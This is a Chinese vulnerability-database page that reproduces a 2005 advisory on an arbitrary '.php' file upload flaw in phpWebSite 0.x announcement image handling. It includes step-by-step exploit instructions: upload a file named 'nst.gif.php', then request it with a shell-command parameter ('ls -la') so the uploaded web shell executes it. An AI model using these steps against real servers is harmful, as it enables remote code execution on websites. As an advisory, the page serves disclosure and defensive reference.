phpWebSite 0.x – Image File Processing Arbitrary ‘.PHP’ File Upload

phpWebSite 0.x – Image File Processing Arbitrary ‘.PHP’ File Upload

漏洞ID 1054923 漏洞类型
发布时间 2005-02-24 更新时间 2005-02-24
图片[1]-phpWebSite 0.x – Image File Processing Arbitrary ‘.PHP’ File Upload-安全小百科CVE编号 N/A
图片[2]-phpWebSite 0.x – Image File Processing Arbitrary ‘.PHP’ File Upload-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/25161
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/12653/info

phpWebSite is reported prone to a remote arbitrary PHP file upload vulnerability. The issue presents itself due to a lack of sanitization performed on image files that are uploaded when submitting an announcement.

A remote attacker may exploit this condition to execute arbitrary PHP code in the context of the hosting web server process.

This vulnerability is reported to affect phpWebSite versions up to an including version 0.10.0. 

http://www.example.com/index.php?module=announce&ANN_user_op=submit_announcement&MMN_position=3:3

1. Fill all inputs
2. in Image: select nst.gif.php

press Save.

Go here http://www.example.com/images/announce/nst.gif.php?nst=ls -la

相关推荐: NetScreen-25 HTML Injection Log File Display Vulnerability

NetScreen-25 HTML Injection Log File Display Vulnerability 漏洞ID 1101982 漏洞类型 Input Validation Error 发布时间 2002-06-05 更新时间 2002-06-0…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享